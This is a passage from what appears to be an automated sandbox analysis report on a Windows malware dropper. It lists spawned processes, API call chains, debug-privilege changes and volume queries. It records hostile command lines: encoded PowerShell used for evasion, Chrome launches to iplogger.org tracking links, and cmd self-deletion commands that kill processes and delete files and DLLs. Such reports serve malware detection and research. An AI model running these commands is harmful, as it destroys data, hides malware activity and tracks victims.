                    Source: C:\Program Files (x86)\Company\NewProduct\kukurzka9000.exeCode function: 16_2_0040AE06 LocalAlloc,LocalAlloc,SHGetSpecialFolderPathW,lstrcmpW,StrCpyW,StrCpyW,FindFirstFileW,LocalFree,LocalFree,lstrcmpW,lstrcmpW,LocalAlloc,PathCombineW,lstrcmpW,LocalAlloc,PathCombineW,LocalAlloc,LocalAlloc,SHGetSpecialFolderPathW,lstrlenW,LocalAlloc,StrCpyW,WideCharToMultiByte,LocalAlloc,WideCharToMultiByte,LocalAlloc,CopyFileW,CreateFileW,GetFileSize,LocalAlloc,StrCpyW,LocalFree,DeleteFileW,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,FindNextFileW,LocalFree,LocalFree,FindClose,16_2_0040AE06
                    Source: C:\Program Files (x86)\Company\NewProduct\kukurzka9000.exeCode function: 16_2_00403C8F StrStrW,StrStrW,StrStrW,lstrlenW,LocalAlloc,LocalAlloc,LocalAlloc,lstrlenW,LocalAlloc,lstrlenW,LocalAlloc,LocalAlloc,StrStrW,StrStrW,LocalAlloc,PathCombineW,LocalAlloc,FindFirstFileW,StrStrW,LocalAlloc,StrCpyW,StrRChrW,StrRChrW,LocalAlloc,PathCombineW,LocalFree,LocalFree,FindNextFileW,FindClose,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,StrStrW,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,16_2_00403C8F
                    Source: C:\Program Files (x86)\Company\NewProduct\kukurzka9000.exeCode function: 16_2_00401E18 LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,PathCombineW,StrCpyW,FindFirstFileW,LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,LocalAlloc,LocalAlloc,StrCpyW,LocalAlloc,WideCharToMultiByte,WideCharToMultiByte,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalAlloc,LocalAlloc,StrCpyW,wsprintfW,PathCombineW,FindFirstFileW,LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,LocalAlloc,LocalAlloc,StrCpyW,LocalAlloc,WideCharToMultiByte,WideCharToMultiByte,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,16_2_00401E18
                    Source: C:\Program Files (x86)\Company\NewProduct\kukurzka9000.exeCode function: 16_2_00406725 LocalAlloc,StrCpyW,StrCpyW,FindFirstFileW,LocalAlloc,PathCombineW,lstrcmpW,LocalAlloc,LocalAlloc,LocalAlloc,StrCpyW,StrCpyW,StrCpyW,LocalAlloc,LocalAlloc,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,LocalAlloc,LocalAlloc,StrCpyW,LocalAlloc,WideCharToMultiByte,WideCharToMultiByte,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,FindNextFileW,FindClose,LocalFree,16_2_00406725
                    Source: C:\Program Files (x86)\Company\NewProduct\kukurzka9000.exeCode function: 16_2_0040633E FindFirstFileW,lstrcmpW,LocalAlloc,PathCombineW,LocalFree,FindNextFileW,FindClose,lstrlenW,16_2_0040633E
                    Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exeCode function: 14_2_00408ADD LocalAlloc,GetDesktopWindow,LoadLibraryW,LoadLibraryW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LocalAlloc,GetClientRect,SetStretchBltMode,GetSystemMetrics,StretchBlt,GetSystemMetrics,StretchBlt,SelectObject,GetObjectW,LocalAlloc,CreateFileW,CreateFileW,LocalAlloc,LocalAlloc,StrCpyW,WideCharToMultiByte,WideCharToMultiByte,LocalFree,CloseHandle,DeleteFileW,LocalFree,LocalFree,LocalAlloc,LocalAlloc,StrCpyW,LocalAlloc,WideCharToMultiByte,WideCharToMultiByte,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,DeleteObject,DeleteObject,14_2_00408ADD
                    Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exeCode function: 14_2_006DC008 push dword ptr fs:[00000030h]14_2_006DC008
                    Source: C:\Program Files (x86)\Company\NewProduct\ordo_sec666.exeProcess queried: DebugPort
                    Source: C:\Program Files (x86)\Company\NewProduct\namdoitntn.exeProcess token adjusted: Debug
                    Source: C:\Windows\SysWOW64\taskkill.exeProcess token adjusted: Debug
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXEProcess token adjusted: Debug
                    Source: C:\Windows\SysWOW64\taskkill.exeProcess token adjusted: Debug
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                    Source: C:\Program Files (x86)\Company\NewProduct\kukurzka9000.exeMemory protected: page write copy | page execute | page execute read | page execute and read and write | page guard

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXEProcess created: Base64 decoded Start-Sleep -Seconds 34
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXEProcess created: Base64 decoded Start-Sleep -Seconds 34
                    Source: C:\Users\user\Desktop\q1wLT3xKiY.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://iplogger.org/1ARmX4Jump to behavior
                    Source: C:\Users\user\Desktop\q1wLT3xKiY.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://iplogger.org/1AAmX4Jump to behavior
                    Source: C:\Users\user\Desktop\q1wLT3xKiY.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://iplogger.org/1AFmX4Jump to behavior
                    Source: C:\Users\user\Desktop\q1wLT3xKiY.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://iplogger.org/1AGmX4Jump to behavior
                    Source: C:\Users\user\Desktop\q1wLT3xKiY.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://iplogger.org/1AJmX4Jump to behavior
                    Source: C:\Users\user\Desktop\q1wLT3xKiY.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://iplogger.org/1AKmX4Jump to behavior
                    Source: C:\Users\user\Desktop\q1wLT3xKiY.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://iplogger.org/1AZmX4Jump to behavior
                    Source: C:\Users\user\Desktop\q1wLT3xKiY.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://iplogger.org/1AVmX4Jump to behavior
                    Source: C:\Users\user\Desktop\q1wLT3xKiY.exeProcess created: C:\Program Files (x86)\Company\NewProduct\F0geI.exe "C:\Program Files (x86)\Company\NewProduct\F0geI.exe" Jump to behavior
                    Source: C:\Users\user\Desktop\q1wLT3xKiY.exeProcess created: C:\Program Files (x86)\Company\NewProduct\kukurzka9000.exe "C:\Program Files (x86)\Company\NewProduct\kukurzka9000.exe" Jump to behavior
                    Source: C:\Users\user\Desktop\q1wLT3xKiY.exeProcess created: C:\Program Files (x86)\Company\NewProduct\namdoitntn.exe "C:\Program Files (x86)\Company\NewProduct\namdoitntn.exe" Jump to behavior
                    Source: C:\Users\user\Desktop\q1wLT3xKiY.exeProcess created: C:\Program Files (x86)\Company\NewProduct\real.exe "C:\Program Files (x86)\Company\NewProduct\real.exe" Jump to behavior
                    Source: C:\Users\user\Desktop\q1wLT3xKiY.exeProcess created: C:\Program Files (x86)\Company\NewProduct\safert44.exe "C:\Program Files (x86)\Company\NewProduct\safert44.exe" Jump to behavior
                    Source: C:\Users\user\Desktop\q1wLT3xKiY.exeProcess created: C:\Program Files (x86)\Company\NewProduct\jshainx.exe "C:\Program Files (x86)\Company\NewProduct\jshainx.exe" Jump to behavior
                    Source: C:\Users\user\Desktop\q1wLT3xKiY.exeProcess created: C:\Program Files (x86)\Company\NewProduct\brokerius.exe "C:\Program Files (x86)\Company\NewProduct\brokerius.exe" Jump to behavior
                    Source: C:\Users\user\Desktop\q1wLT3xKiY.exeProcess created: C:\Program Files (x86)\Company\NewProduct\captain09876.exe "C:\Program Files (x86)\Company\NewProduct\captain09876.exe" Jump to behavior
                    Source: C:\Users\user\Desktop\q1wLT3xKiY.exeProcess created: C:\Program Files (x86)\Company\NewProduct\ordo_sec666.exe "C:\Program Files (x86)\Company\NewProduct\ordo_sec666.exe" Jump to behavior
                    Source: C:\Users\user\Desktop\q1wLT3xKiY.exeProcess created: C:\Program Files (x86)\Company\NewProduct\WW1.exe "C:\Program Files (x86)\Company\NewProduct\WW1.exe" Jump to behavior
                    Source: C:\Program Files (x86)\Company\NewProduct\real.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /im real.exe /f & timeout /t 6 & del /f /q "C:\Program Files (x86)\Company\NewProduct\real.exe" & del C:\PrograData\*.dll & exit
                    Source: C:\Program Files (x86)\Company\NewProduct\brokerius.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /im brokerius.exe /f & timeout /t 6 & del /f /q "C:\Program Files (x86)\Company\NewProduct\brokerius.exe" & del C:\PrograData\*.dll & exit
                    Source: C:\Program Files (x86)\Company\NewProduct\WW1.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /im WW1.exe /f & timeout /t 6 & del /f /q "C:\Program Files (x86)\Company\NewProduct\WW1.exe" & del C:\PrograData\*.dll & exit
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /im real.exe /f
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 6
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXEProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMwA0AA==
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXEProcess created: unknown unknown
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /im brokerius.exe /f
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 6
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /im real.exe /f
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /im brokerius.exe /f
                    Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exeCode function: LocalAlloc,LocalAlloc,LocalAlloc,GetLocaleInfoW,GetUserDefaultLCID,GetLocaleInfoW,wsprintfW,LocalFree,LocalFree,14_2_00409064
                    Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exeCode function: ___getlocaleinfo,__nh_malloc_dbg,__nh_malloc_dbg,__nh_malloc_dbg,__nh_malloc_dbg,___crtLCMapStringW,___crtLCMapStringA,___crtLCMapStringA,14_2_00414900
                    Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exeCode function: __nh_malloc_dbg,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_fix_grouping,14_2_00427A30
                    Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exeCode function: ___crtGetLocaleInfoW,___crtGetLocaleInfoW,__nh_malloc_dbg,___crtGetLocaleInfoW,__nh_malloc_dbg,_strncpy_s,__invoke_watson_if_error,___crtGetLocaleInfoW,_isdigit,14_2_00423CA0
                    Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,14_2_00426D20
                    Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exeCode function: __nh_malloc_dbg,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_fix_grouping,14_2_00427660
                    Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoW_stat,_LocaleUpdate::~_LocaleUpdate,14_2_0042E740
                    Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,_LocaleUpdate::~_LocaleUpdate,14_2_0042E7B0
                    Source: C:\Program Files (x86)\Company\NewProduct\kukurzka9000.exeCode function: LocalAlloc,LocalAlloc,LocalAlloc,GetLocaleInfoW,GetUserDefaultLCID,GetLocaleInfoW,wsprintfW,LocalFree,LocalFree,16_2_00409064
                    Source: C:\Program Files (x86)\Company\NewProduct\namdoitntn.exeQueries volume information: C:\Program Files (x86)\Company\NewProduct\namdoitntn.exe VolumeInformation
                    Source: C:\Program Files (x86)\Company\NewProduct\namdoitntn.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
                    Source: C:\Program Files (x86)\Company\NewProduct\namdoitntn.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
                    Source: C:\Program Files (x86)\Company\NewProduct\namdoitntn.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
                    Source: C:\Program Files (x86)\Company\NewProduct\namdoitntn.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
                    Source: C:\Program Files (x86)\Company\NewProduct\namdoitntn.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Program Files (x86)\Company\NewProduct\namdoitntn.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Program Files (x86)\Company\NewProduct\namdoitntn.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Program Files (x86)\Company\NewProduct\namdoitntn.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Program Files (x86)\Company\NewProduct\namdoitntn.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
                    Source: C:\Program Files (x86)\Company\NewProduct\namdoitntn.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Program Files (x86)\Company\NewProduct\namdoitntn.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
                    Source: C:\Program Files (x86)\Company\NewProduct\namdoitntn.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                    Source: C:\Program Files (x86)\Company\NewProduct\namdoitntn.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                    Source: C:\Program Files (x86)\Company\NewProduct\namdoitntn.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                    Source: C:\Program Files (x86)\Company\NewProduct\namdoitntn.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                    Source: C:\Program Files (x86)\Company\NewProduct\real.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Program Files (x86)\Company\NewProduct\real.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Program Files (x86)\Company\NewProduct\real.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Program Files (x86)\Company\NewProduct\safert44.exeQueries volume information: C:\Program Files (x86)\Company\NewProduct\safert44.exe VolumeInformation
                    Source: C:\Program Files (x86)\Company\NewProduct\safert44.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
                    Source: C:\Program Files (x86)\Company\NewProduct\safert44.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
                    Source: C:\Program Files (x86)\Company\NewProduct\safert44.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
                    Source: C:\Program Files (x86)\Company\NewProduct\safert44.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
                    Source: C:\Program Files (x86)\Company\NewProduct\safert44.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Program Files (x86)\Company\NewProduct\safert44.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Program Files (x86)\Company\NewProduct\safert44.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Program Files (x86)\Company\NewProduct\safert44.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
                    Source: C:\Program Files (x86)\Company\NewProduct\safert44.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Program Files (x86)\Company\NewProduct\safert44.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Program Files (x86)\Company\NewProduct\safert44.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
                    Source: C:\Program Files (x86)\Company\NewProduct\jshainx.exeQueries volume information: C:\Program Files (x86)\Company\NewProduct\jshainx.exe VolumeInformation
                    Source: C:\Program Files (x86)\Company\NewProduct\jshainx.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
                    Source: C:\Program Files (x86)\Company\NewProduct\jshainx.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
                    Source: C:\Program Files (x86)\Company\NewProduct\jshainx.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
                    Source: C:\Program Files (x86)\Company\NewProduct\jshainx.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
                    Source: C:\Program Files (x86)\Company\NewProduct\jshainx.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Program Files (x86)\Company\NewProduct\jshainx.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Program Files (x86)\Company\NewProduct\jshainx.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Program Files (x86)\Company\NewProduct\jshainx.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Program Files (x86)\Company\NewProduct\jshainx.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
                    Source: C:\Program Files (x86)\Company\NewProduct\jshainx.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Program Files (x86)\Company\NewProduct\jshainx.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
                    Source: C:\Program Files (x86)\Company\NewProduct\brokerius.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Program Files (x86)\Company\NewProduct\brokerius.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Program Files (x86)\Company\NewProduct\brokerius.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Program Files (x86)\Company\NewProduct\WW1.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Program Files (x86)\Company\NewProduct\WW1.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Program Files (x86)\Company\NewProduct\WW1.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXEQueries volume information: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXE VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXEQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXEQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXEQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXEQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
